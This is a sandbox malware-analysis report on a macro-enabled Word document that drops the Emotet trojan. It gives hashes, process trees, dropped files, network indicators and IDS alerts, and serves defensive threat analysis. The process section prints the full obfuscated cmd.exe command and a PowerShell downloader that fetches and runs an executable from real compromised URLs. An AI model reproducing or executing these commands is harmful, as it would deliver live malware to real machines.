analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e329cbd48a890b4e97caa0ac22c2bc9f68172b8dec5dcbe5ce9afadfd57f329c.doc

Full analysis: https://app.any.run/tasks/8716f214-7fbc-42ce-a71c-aa994d75f274
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 17:32:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jackson, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 12:45:00 2018, Last Saved Time/Date: Wed Nov 14 12:45:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

1C3B61BD9A9AA11307D2DE89DFB687EF

SHA1:

C8BD0A024253D70EF2C80C5F741AF3F4178E7532

SHA256:

E329CBD48A890B4E97CAA0AC22C2BC9F68172B8DEC5DCBE5CE9AFADFD57F329C

SSDEEP:

1536:YZuocn1kp59gxBK85fBt+a9SV6r2EBDxoRwBnRDhYxjhUx5xfxThoxtBqBYRM6Uu:441k/W48fFDxoRwBnRDhYxjhUx5xfxTi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • LKX.exe (PID: 2656)
      • LKX.exe (PID: 3812)
      • lpiograd.exe (PID: 2440)
      • lpiograd.exe (PID: 2928)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3840)
    • EMOTET was detected

      • lpiograd.exe (PID: 2928)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3220)
    • Emotet process was detected

      • lpiograd.exe (PID: 2440)
    • Connects to CnC server

      • lpiograd.exe (PID: 2928)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3220)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2092)
    • Starts itself from another location

      • LKX.exe (PID: 2656)
    • Creates files in the user directory

      • powershell.exe (PID: 3840)
    • Connects to unusual port

      • lpiograd.exe (PID: 2928)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3840)
      • LKX.exe (PID: 2656)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3220)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:14 12:45:00
CreateDate: 2018:11:14 12:45:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Jackson
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe lkx.exe no specs lkx.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3220"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e329cbd48a890b4e97caa0ac22c2bc9f68172b8dec5dcbe5ce9afadfd57f329c.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2092cmd /V/C"^se^t ^oI^Q^1=AO(B=2@^a8^U^T^EICG^iS^[^Xk^y\6rc nbF^f^xo^$^e+^Y^WVp^m;^M3/^{^uqt^jLRP^-'^]^Kh^:^d^D^H^,N)^s^.w}0lv1&&^f^or %N ^in (3^8^;^3^1;^6^6;^3^3;23;6^4^;^56^;3^3^;69^;6^9;25^;3^2;1^5;5^8^;4^9^;4;^53^;^5^0^;^2^7^;^45;53^;^40^;^32^;^1^5^;^51;37;^4;5^3^;5^6^;47^;^4^7;^3^8^;^57^;43^;43^;^24;^52;^4^7^;6^5^;24^;31;^39;^6^5;7^;4^5;4^3;51;64^;38^;0^;41^;27^;45^;^1^6;58;5;^6^;^5^6^;^47;^47;^3^8;^5^7;43^;43;64;^56^;^7^;48;^1^5;64;^5^6^;^7;^6^9^;3^1;39;^65;^2^4^;^31^;39^;^43^;28;^1;60;22;^42^;22^;^46;^3^7^;6;5^6;4^7;4^7;^3^8^;5^7;4^3^;4^3^;^38;^47;^3^3^;^7;^2^4;^7;^58;33;^3^9;^1^5;24;^7^0^;^3^1;^45^;2^4;56;3^3^;2^3;65^;^15^;26^;^43^;8^;^6^9;^37^;^23^;^45;3^6;7;^6;56;^47^;47;^3^8;57^;4^3^;43;^8;22^;^2^2;^7;3^8;^3^8;^6^9^;15^;^7;^26;2^4;33^;^65;^2^4;3^1^;^3^9^;^43;^3^5;^22;^10;0;3^8^;24;^18^;8;0;^6^;^5^6^;^47^;4^7^;38;5^7^;^4^3^;^4^3^;3^8^;^69^;7;26;^3^3^;47;3^3;^2^9;7;^4^5^;2^6;33;^65^;^24^;^31;39^;4^3;^20;45;7;^1^5^;^4^8;^49^;9^;^1^4^;^6^9^;^6^2;^5^3^;^6^5;^1^6^;^3^8;69^;1^5^;^47;2;^5^3;6;5^3;^6^3^;4^0;32;^0;35;^13;4^;^2;^17^;1^6;20^;^6^4;^47^;^33^;^39;6^5;^12^;^1;6^5;^5^1^;^7;4^7;56^;^5^4^;^57^;5^7^;1^4;33^;^47;^10;3^3^;3^9;^38^;5^1;7;47;56;^2^;^6^3^;34;53^;^21^;4^9^;^55^;18;^6^5^;^3^3;30^;^33;53^;63;40^;^3^2;36^;^9^;5^6^;2^5^;^4^;^6^2;^3^3^;66;^5^2;^1;^2^7;48^;3^3;^2^4^;^4^7;2^5;^52;2^4;^3^1;^3^9^;^2^5;5^3^;39;^6^4;3^0^;^3^9;^69^;^5;^65^;30;^3^9;^6^9^;^56^;47^;47;^38^;5^3;^40;3^2;48;4^5^;^1^8;^25;^4^;^25^;^62^;33;^6^6^;5^2^;1;^27;^4^8^;^33;^24^;47;2^5;^5^2;2^4^;3^1;^3^9^;2^5^;^5^3^;^7^;^5^8^;31^;^5^8^;27^;6^5^;^64;^4^7^;23^;33^;^7;^39;5^3;4^0^;29;^3^1^;^2^3^;33;7;^24;^5^6^;2^;32;^37^;49;5^9;25^;1^5^;26;25^;32;15^;51^;3^7;6^3;4^4^;47;^2^3;20^;4^4;3^2;36^;^9;56^;^65^;31^;^38;^3^3^;^2^6;2;^5^3;14^;1^1;^1^0^;5^3;^61^;3^2;^37;4^9^;59;61;68^;6^3^;^40;^32;^3^6;^9;^56^;6^5^;6^4;^3^3^;^26^;^5^8;^2^;6^3;4^0^;^3^2^;^4^8;^45;1^8^;65;^3^1^;38;3^3^;26;^2;^6^3;40;32;^48^;^4^5^;1^8;65;47;20^;38;^3^3^;^2^5^;^4;^25^;^7^1;40^;^3^2;^48^;^45;^18;^65^;^6^6^;^23^;^15;^47;^33^;^2^;^3^2;^36^;9^;5^6;^6^5^;2^3^;^3^3;^64;3^8;^31^;^26;6^4^;3^3^;^3;3^1^;^58;^2^0^;63;4^0^;^3^2;^48;45^;1^8;^6^5^;^64^;^7^;70;3^3^;^47;^31;29;1^5;^6^9^;33;2;32^;^0^;^3^5^;13^;6^3^;^40^;^16^;^47^;^7^;23;4^7;5^2^;^5^1^;23;3^1^;^2^4;^33^;6^4;^64;^25^;32;^0;3^5;13^;40;^2^7^;23;^33^;7;1^9^;67^;2^4;7;4^7;^2^4;56^;^44^;6^7;67;^2^5;25^;^25^;^25;^25;^25^;2^5;25^;^2^5;2^5;2^5;^2^5^;25^;^25;2^5;2^5^;2^5^;82)^do ^s^e^t u^1^e^J=!u^1^e^J!!^oI^Q^1:~%N,1!&&^i^f %N ^g^tr ^81 cal^l %u^1^e^J:*u1e^J^!^=%" C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3840powershell $idL='Rbu';$iPV='http://c-t.com.au/PspAMbuSd2@http://shajishalom.com/FOH636qV@http://pteacademicvoucher.in/8lVruWa@http://866appliance.com/Y6TApcX8A@http://planetefaune.com/yuaijLUGlN'.Split('@');$AYC=([System.IO.Path]::GetTempPath()+'\LKX.exe');$WUh =New-Object -com 'msxml2.xmlhttp';$juX = New-Object -com 'adodb.stream';foreach($VLD in $iPV){try{$WUh.open('GET',$VLD,0);$WUh.send();$juX.open();$juX.type = 1;$juX.write($WUh.responseBody);$juX.savetofile($AYC);Start-Process $AYC;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3812"C:\Users\admin\AppData\Local\Temp\LKX.exe" C:\Users\admin\AppData\Local\Temp\LKX.exepowershell.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
2656"C:\Users\admin\AppData\Local\Temp\LKX.exe"C:\Users\admin\AppData\Local\Temp\LKX.exe
LKX.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
2440"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
LKX.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Exit code:
0
Version:
8.0.0.0
2928"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Borland Corporation
Integrity Level:
MEDIUM
Description:
Borland C++ Multi-thread RTL (WIN/VCL MT)
Version:
8.0.0.0
Total events
1 673
Read events
1 257
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9CD1.tmp.cvr
MD5:
SHA256:
3840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\55I45QUM1XGPMEFLSEWG.temp
MD5:
SHA256:
3840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a879.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3220WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:70C278D8BB09C3041479A9BC2AF4E1A9
SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60
2656LKX.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:BBBA81368267A5A2BB2AC77853B8C78B
SHA256:667CDA76B582C0771F85AD12167238E0F4BB12F479030D99C8A15D7F08EB9975
3840powershell.exeC:\Users\admin\AppData\Local\Temp\LKX.exeexecutable
MD5:BBBA81368267A5A2BB2AC77853B8C78B
SHA256:667CDA76B582C0771F85AD12167238E0F4BB12F479030D99C8A15D7F08EB9975
3840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$29cbd48a890b4e97caa0ac22c2bc9f68172b8dec5dcbe5ce9afadfd57f329c.docpgc
MD5:7C5DCE719AC91C24565EDE653F229AE1
SHA256:D62FD61EFDED5C91E568C328162C83F7BC8F7940B2A03628647532B8D7EF695E
3840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2928
lpiograd.exe
GET
50.78.167.65:7080
http://50.78.167.65:7080/
US
malicious
3840
powershell.exe
GET
200
50.62.194.30:80
http://c-t.com.au/PspAMbuSd2/
US
executable
412 Kb
suspicious
3840
powershell.exe
GET
301
50.62.194.30:80
http://c-t.com.au/PspAMbuSd2
US
html
196 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3840
powershell.exe
50.62.194.30:80
c-t.com.au
GoDaddy.com, LLC
US
suspicious
2928
lpiograd.exe
177.242.156.119:80
SERVICIO Y EQUIPO EN TELEFONÍA INTERNET Y TV S.A. DE C.V.
MX
malicious
2928
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious

DNS requests

Domain
IP
Reputation
c-t.com.au
  • 50.62.194.30
unknown

Threats

PID
Process
Class
Message
3840
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3840
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3840
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2928
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info